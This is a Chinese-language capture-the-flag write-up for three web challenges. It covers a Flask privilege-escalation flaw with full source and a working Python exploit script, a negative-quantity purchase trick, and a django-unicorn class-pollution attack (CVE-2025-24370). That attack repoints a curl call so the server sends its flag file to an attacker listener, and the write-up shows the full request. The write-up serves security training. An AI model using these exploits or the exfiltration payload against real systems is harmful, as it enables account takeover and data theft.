复现平台:https://gz.imxbt.cn/games/27/challenges#

WorkerDB

注册和登录功能点/api/login 和 /api/register

随便注册一个账号进去看看,发现自己的 role 是 user;结合题目描述,我们的目的就是成为 admin,并且已知这个题是用 session 来维持登录身份的。

这个题我尝试了用 flask-unsign 爆破 session 密钥,是不行的(后面从源码可以看到 secret_key 是 secrets.token_hex(16) 随机生成的),所以伪造 session 这条路行不通。

于是尝试dirsearch 扫描出/admin路径 访问提示我Access denied,登陆进去有change attribute功能点 抓包抓到一个新路由/api/settings/update

源码:

from flask import Flask, redirect, render_template, request, jsonify, session, url_for
from multiprocessing import Lock
from functools import wraps
import secrets
import sqlite3
import json
import os

app = Flask(__name__)
# Session-signing key; a fresh random value is generated each time this module is loaded.
app.secret_key = secrets.token_hex(16)

# Attribute names that update_settings accepts from the request body;
# the set is also handed to the home template by index().
ALLOWED_ATTRIBUTES = {
'role', 'email', 'display_name', 'theme', 'language', 'notifications',
'timezone', 'avatar', 'bio', 'website', 'location'
}

def init_db():
    """Create the ``users`` table if it is missing and seed the admin account.

    The table stores ``username``, ``password`` and a JSON-encoded
    ``attributes`` blob per user.  When no row named ``admin`` exists, one is
    inserted with ``role: admin`` and a random password, and that password is
    printed to stdout.  Calling the function again leaves an existing admin
    row untouched.
    """
    conn = sqlite3.connect('database.db')
    try:
        c = conn.cursor()

        c.execute('''
            CREATE TABLE IF NOT EXISTS users (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                username TEXT UNIQUE NOT NULL,
                password TEXT NOT NULL,
                attributes TEXT NOT NULL
            )
        ''')

        c.execute('SELECT id FROM users WHERE username = ?', ('admin',))
        if not c.fetchone():
            admin_attrs = json.dumps({
                'role': 'admin',
                'email': 'admin@example.com',
                'display_name': 'Administrator'
            })
            admin_password = secrets.token_hex(16)
            c.execute('INSERT INTO users (username, password, attributes) VALUES (?, ?, ?)',
                      ('admin', admin_password, admin_attrs))
            print("created admin account with password:", admin_password)

        conn.commit()
    finally:
        # Release the connection even if one of the statements above raises.
        conn.close()

def get_db():
    """Open a new connection to ``database.db`` whose rows support access by column name.

    Returns:
        A ``sqlite3.Connection`` with ``row_factory`` set to ``sqlite3.Row``.
        The caller is responsible for closing it.
    """
    conn = sqlite3.connect('database.db')
    conn.row_factory = sqlite3.Row
    return conn

# One lock shared by every view wrapped with requires_auth.
l = Lock()


def requires_auth(f):
    """Decorator that rejects requests without a logged-in session.

    If ``user_id`` is absent from the session, a JSON 401 response is returned
    and the wrapped view is not called.  Otherwise the view runs while holding
    the module-level lock ``l``, so wrapped views do not overlap with each
    other while that lock is held.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        if 'user_id' not in session:
            return jsonify({"error": "Authentication required"}), 401
        with l:
            return f(*args, **kwargs)
    return decorated

def has_xss(value):
    """Return True when *value* is a string containing a blacklisted character.

    The blacklist is ``< > " ' ( ) { } =``.  Non-string values (numbers,
    ``None``, lists, dicts, ...) are never flagged and yield ``False``.
    """
    if not isinstance(value, str):
        return False
    return any(c in value for c in ['<', '>', '"', "'", '(', ')', '{', '}', '='])

@app.route('/api/register', methods=['POST'])
def api_register():
    """Register a new account from a JSON body with ``username`` and ``password``.

    Responses:
        200 -- account created with default attributes (``role`` is ``user``).
        400 -- body missing/empty, a credential missing, or username taken.
        500 -- a ``sqlite3.Error`` was raised.
    """
    try:
        data = request.get_json()
        if not data:
            return jsonify({"error": "Invalid request"}), 400

        username = data.get('username')
        password = data.get('password')

        if not username or not password:
            return jsonify({"error": "Invalid credentials"}), 400

        db = get_db()
        cursor = db.cursor()

        cursor.execute('SELECT id FROM users WHERE username = ?', (username,))
        if cursor.fetchone():
            db.close()
            return jsonify({"error": "Username already exists"}), 400

        # Every self-registered account starts out as a plain user.
        attributes = json.dumps({
            'role': 'user',
            'email': '',
            'display_name': username,
            'theme': 'light'
        })

        # NOTE(review): the password is stored exactly as submitted.
        cursor.execute('INSERT INTO users (username, password, attributes) VALUES (?, ?, ?)',
                       (username, password, attributes))

        db.commit()
        db.close()
        return jsonify({"message": "Registration successful"})

    except sqlite3.Error:
        return jsonify({"error": "Server error"}), 500

@app.route('/api/login', methods=['POST'])
def api_login():
    """Log a user in from a JSON body with ``username`` and ``password``.

    On success the session receives ``user_id`` and a copy of the user's
    current ``role`` attribute.

    Responses:
        200 -- credentials matched a row in ``users``.
        400 -- body missing/empty or a credential missing.
        401 -- no matching username/password pair.
        500 -- a ``sqlite3.Error`` was raised.
    """
    try:
        data = request.get_json()
        if not data:
            return jsonify({"error": "Invalid request"}), 400

        username = data.get('username')
        password = data.get('password')

        if not username or not password:
            return jsonify({"error": "Invalid credentials"}), 400

        db = get_db()
        cursor = db.cursor()

        cursor.execute('SELECT id, attributes FROM users WHERE username = ? AND password = ?',
                       (username, password))

        user = cursor.fetchone()
        db.close()

        if user:
            attrs = json.loads(user['attributes'])
            session['user_id'] = user['id']
            # Snapshot of the role at login time.
            session['role'] = attrs.get('role')
            return jsonify({"message": "Login successful"})

        return jsonify({"error": "Invalid credentials"}), 401

    except sqlite3.Error:
        return jsonify({"error": "Server error"}), 500

@app.route('/api/settings/update', methods=['POST'])
@requires_auth
def update_settings():
    """Update the logged-in user's attributes from the JSON request body.

    The update happens in two separately committed phases:

    1. Every key of the request body that already exists in the stored
       attributes is set to ``None`` and the result is committed.
    2. Keys in ``ALLOWED_ATTRIBUTES`` whose values pass ``has_xss`` are
       written back, ``role`` is forced to ``'user'``, and the result is
       committed again.

    NOTE(review): this is the challenge's vulnerable logic, kept as-is on
    purpose.  Phase 1 only iterates the body, so a JSON array such as
    ``["role"]`` works there; phase 2 calls ``.items()``, which a list does
    not have.  The resulting ``AttributeError`` is not a ``sqlite3.Error``
    and is not caught here, so the request aborts after phase 1 has already
    been committed and ``role`` stays ``None``.
    """
    try:
        user_id = session['user_id']
        new_attrs = request.get_json()

        if not new_attrs:
            return jsonify({"error": "Invalid input"}), 400

        db = get_db()
        cursor = db.cursor()

        cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
        current_attrs = json.loads(cursor.fetchone()['attributes'])

        # Phase 1: blank every submitted key that is already stored, then commit.
        temp_attrs = current_attrs.copy()
        for key in new_attrs:
            if key in current_attrs:
                temp_attrs[key] = None

        cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
                       (json.dumps(temp_attrs), user_id))
        db.commit()

        # Phase 2: keep only whitelisted keys whose values pass the filter.
        # A non-dict body raises AttributeError on .items() right here.
        sanitized_attrs = {}
        for key, value in new_attrs.items():
            if key in ALLOWED_ATTRIBUTES:
                if not has_xss(value):
                    sanitized_attrs[key] = value

        cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
        current_attrs = json.loads(cursor.fetchone()['attributes'])

        final_attrs = current_attrs.copy()
        for key, value in sanitized_attrs.items():
            final_attrs[key] = value
        # NOTE(review): indentation was lost in the paste; this line is placed
        # after the loop (role always reset to 'user') -- confirm against the
        # original attachment.
        final_attrs['role'] = 'user'

        cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
                       (json.dumps(final_attrs), user_id))
        db.commit()
        db.close()

        return jsonify({"message": "Settings updated successfully"})

    except sqlite3.Error:
        return jsonify({"error": "Server error"}), 500

@app.route('/api/manage/permissions', methods=['POST'])
@requires_auth
def manage_permissions():
    """Set the ``role`` attribute of ``target_user`` to ``new_role``.

    Expects a JSON body with ``target_user`` (a username) and ``new_role``.

    Responses:
        200 -- the target's role was updated.
        400 -- body missing or a required field absent.
        403 -- the caller's stored role is exactly ``'user'``.
        404 -- no user named ``target_user``.
        500 -- a ``sqlite3.Error`` was raised.

    NOTE(review): challenge logic kept as-is.  The gate is a deny-list
    (``role != 'user'``), not a check for ``'admin'``, so a caller whose
    stored role is ``None`` is allowed through.
    """
    try:
        user_id = session['user_id']
        data = request.get_json()

        if not data or 'target_user' not in data or 'new_role' not in data:
            return jsonify({"error": "Missing required fields"}), 400

        target_username = data['target_user']
        new_role = data['new_role']

        db = get_db()
        cursor = db.cursor()

        # The caller's role is read from the database, not from the session.
        cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
        user_data = cursor.fetchone()
        current_user_attrs = json.loads(user_data['attributes'])

        # Anything other than the literal 'user' (including None) passes.
        if current_user_attrs.get('role') != 'user':
            cursor.execute('SELECT id, attributes FROM users WHERE username = ?', (target_username,))
            target_user = cursor.fetchone()

            if not target_user:
                db.close()
                return jsonify({"error": "Target user not found"}), 404

            target_attrs = json.loads(target_user['attributes'])
            target_attrs['role'] = new_role

            cursor.execute('UPDATE users SET attributes = ? WHERE username = ?',
                           (json.dumps(target_attrs), target_username))

            db.commit()
            db.close()
            return jsonify({"message": "Permissions updated successfully"})

        db.close()
        return jsonify({"error": "Access denied"}), 403

    except sqlite3.Error:
        return jsonify({"error": "Server error"}), 500

@app.route('/api/admin', methods=['GET'])
@requires_auth
def admin_panel():
    """Return the flag when the logged-in user's stored role is ``'admin'``.

    The role is read from the ``users`` table on every request.

    Responses:
        200 -- JSON with a welcome message and the ``FLAG`` environment
               variable (or the placeholder default).
        403 -- stored role is not ``'admin'``.
        500 -- a ``sqlite3.Error`` was raised.
    """
    try:
        user_id = session['user_id']

        db = get_db()
        cursor = db.cursor()
        cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))

        user_data = cursor.fetchone()
        db.close()

        attrs = json.loads(user_data['attributes'])

        if attrs.get('role') == 'admin':
            return jsonify({
                "message": "Welcome to the admin panel",
                "flag": os.getenv("FLAG", "cube{example_flag}")
            })

        return jsonify({"error": "Access denied"}), 403

    except sqlite3.Error:
        return jsonify({"error": "Server error"}), 500

@app.get("/admin")
def admin():
    """Render ``admin.html`` for any logged-in session; otherwise redirect to the index page.

    Only the presence of ``user_id`` in the session is checked here; no role
    check is performed in this view.
    """
    if session.get("user_id"):
        return render_template("admin.html")
    return redirect(url_for("index"))

@app.get("/login")
def login():
    """Render the login page template."""
    return render_template("login.html")

@app.get("/register")
def register():
    """Render the registration page template."""
    return render_template("register.html")

@app.get("/")
def index():
    """Render the home page for a logged-in user, or the landing page otherwise.

    For a logged-in session the user's username and decoded attributes are
    loaded from the database and passed to ``home.html`` together with
    ``ALLOWED_ATTRIBUTES``.
    """
    if session.get("user_id"):
        db = get_db()
        cursor = db.cursor()
        cursor.execute('SELECT username, attributes FROM users WHERE id = ?',
                       (session["user_id"],))
        user = cursor.fetchone()
        db.close()
        return render_template("home.html", user=user[0], attributes=json.loads(user[1]), allowed_attrs=ALLOWED_ATTRIBUTES)
    return render_template("index.html")

# Runs at import time: make sure the table and the admin account exist.
init_db()

最主要的是 /api/settings/update,这里有可以利用的地方。

接口先把请求里出现的字段置为 None 并提交(commit)到数据库,然后才处理并校验输入。当输入类型异常(例如传入 JSON 数组而不是对象)时,后面的 new_attrs.items() 会抛出 AttributeError,而代码只捕获了 sqlite3.Error,请求在这里直接中断;此时敏感字段(如 role)已经被清空并提交,不会再恢复,于是触发了权限检查的逻辑缺陷。所以当我们传入 ["role"] 时,就成功把 role 设置成了 None。

@app.route('/api/settings/update', methods=['POST'])
@requires_auth
def update_settings():
    """Update the logged-in user's attributes from the JSON request body.

    Excerpt of the challenge source, reproduced with its vulnerable logic
    unchanged.  Submitted keys are first blanked and committed; only
    afterwards is the body validated and written back with ``role`` forced
    to ``'user'``.
    """
    try:
        user_id = session['user_id']
        new_attrs = request.get_json()
        if not new_attrs:
            return jsonify({"error": "Invalid input"}), 400
        db = get_db()
        cursor = db.cursor()
        cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
        current_attrs = json.loads(cursor.fetchone()['attributes'])
        # Phase 1: iterating works for a list body too, so ["role"] blanks role.
        temp_attrs = current_attrs.copy()
        for key in new_attrs:
            if key in current_attrs:
                temp_attrs[key] = None
        cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
                       (json.dumps(temp_attrs), user_id))
        db.commit()  # the blanked attributes are now persisted
        # Phase 2: a list has no .items(); the AttributeError raised here is
        # not a sqlite3.Error, so it is not caught below and the handler aborts.
        sanitized_attrs = {}
        for key, value in new_attrs.items():
            if key in ALLOWED_ATTRIBUTES:
                if not has_xss(value):
                    sanitized_attrs[key] = value
        cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
        current_attrs = json.loads(cursor.fetchone()['attributes'])
        final_attrs = current_attrs.copy()
        for key, value in sanitized_attrs.items():
            final_attrs[key] = value
        # NOTE(review): indentation was lost in the paste; placed after the
        # loop (role always reset) -- confirm against the original attachment.
        final_attrs['role'] = 'user'
        cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
                       (json.dumps(final_attrs), user_id))
        db.commit()
        db.close()
        return jsonify({"message": "Settings updated successfully"})
    except sqlite3.Error:
        return jsonify({"error": "Server error"}), 500

因为 /api/manage/permissions 只校验当前用户的 role 是不是 user,只要不是 user 就放行;我们现在的 role 是 None,所以可以通过校验,把自己的 role 改成 admin。

# Excerpt from manage_permissions: any role other than the literal 'user'
# (including None) passes this check.
if current_user_attrs.get('role') != 'user':
    cursor.execute('SELECT id, attributes FROM users WHERE username = ?', (target_username,))
    target_user = cursor.fetchone()

于是利用脚本是:

import requests

# No trailing slash here: every endpoint path below already starts with "/",
# so a trailing slash would produce "//api/..." URLs.
BASE = "http://gz.imxbt.cn:20580"
s = requests.Session()

creds = {"username": "sauy", "password": "122"}

# Steps 1-2: create an ordinary account and log in; the session cookie is
# kept by the requests.Session object.
s.post(BASE + "/api/register", json=creds)
s.post(BASE + "/api/login", json=creds)

# Step 3: send a JSON array instead of an object. The server blanks "role"
# and commits, then fails on new_attrs.items(), so an error status is
# expected here. json= already sets the Content-Type header.
r = s.post(BASE + "/api/settings/update", json=["role"])
print("Step 3 status:", r.status_code)

# Step 4: with role == None the "role != 'user'" check passes, so we can
# promote our own account.
r = s.post(BASE + "/api/manage/permissions", json={
    "target_user": creds["username"],
    "new_role": "admin"
})
print("Step 4 promote:", r.status_code, r.json())

# Step 5: /api/admin reads the role from the database, so no re-login is needed.
r = s.get(BASE + "/api/admin")
print("Step 5 flag:", r.status_code, r.json())

题目描述(中文版)

我们找到了这个合法的网站,它正在销售与黑客相关的零食,但它们的一款产品定价奇怪。找出一种方法在不支付的情况下购买它。

进去是一个类似购物网站的页面,往下看有一个价格很离谱的商品,肯定就是要买它,但余额只有 100。

那就想办法能不能把购买数量改为负数 前端直接改不行 抓个包看看呢

image-20250723210815667

image-20250723210829218

成功。那就用负数数量把总价凑到不超过 100 就行了,满足要求后购买;卡号要求是 16 位纯数字。

todo

其他的我就不啰嗦了。前面的功能也就是输入限制 20 个字符;抓包可以看到传入的格式为:

{"id":"7jqvVCJD","data":{"task":"","tasks":[]},"checksum":"Scdr22XG","actionQueue":[{"type":"syncInput","payload":{"name":"task","value":"test1"},"partials":[]},{"type":"callMethod","payload":{"name":"add"},"partials":[]}],"epoch":1753276792384,"hash":"3667ovLi"}

本题可知是django框架 考点是CVE-2025-24370

https://github.com/adamghill/django-unicorn/security/advisories/GHSA-g9wf-5777-gq43

附件里面很重要的源码

如果攻击者能够修改 settings.CONTACT_URL(例如通过序列化注入、配置修改、数据库注入等),就能将 curl 的目标指向攻击者自己的服务器。

def home(request):
    """Render ``index.html``; on every call, first send ``/tmp/flag.txt`` to ``settings.CONTACT_URL`` via curl.

    NOTE(review): challenge logic kept as-is.  ``settings.CONTACT_URL`` is
    interpolated into a shell command line, so whoever controls that setting
    controls where the flag file is sent.
    """
    # todo charge users $49.99/month because greed
    # todo dont send the confidential flag ...
    system(f'curl {settings.CONTACT_URL} -d @/tmp/flag.txt -X GET -o /dev/null')
    return render(request, f'index.html')

PoC 是(作为 actionQueue 中的一项):

{
  "type": "syncInput",
  "payload": {
    "name": "__init__.__globals__.sys.modules.django.template.backends.django.settings.CONTACT_URL",
    "value": "http://your-ip:port"
  }
}

最后发包:

POST /unicorn/message/todo HTTP/1.1
Host: gz.imxbt.cn:20622
Content-Length: 691
Accept: application/json
X-Requested-With: XMLHttpRequest
X-CSRFTOKEN: OaW6pVSwc7zWaWovIsxPogO3TESlFCY0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Origin: http://gz.imxbt.cn:20622
Referer: http://gz.imxbt.cn:20622/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=OaW6pVSwc7zWaWovIsxPogO3TESlFCY0
Connection: close

{
"id": "n6m7PYbo",
"data": {
"task": "",
"tasks": []
},
"checksum": "PXafcTdS",
"actionQueue": [
{
"type": "syncInput",
"payload": {
"name": "task",
"value": "12"
},
"partials": []
},
{
"type": "syncInput",
"payload": {
"name": "__init__.__globals__.sys.modules.django.template.backends.django.settings.CONTACT_URL",
"value": "http://123:123"
},
"partials": []
},
{
"type": "callMethod",
"payload": {
"name": "add"
},
"partials": []
}
],
"epoch": 1753284343529,
"hash": "djXgQjG4"
}

先服务器开始监听 然后发包 再去网页刷新就可以拿到flag了

image-20250723234039841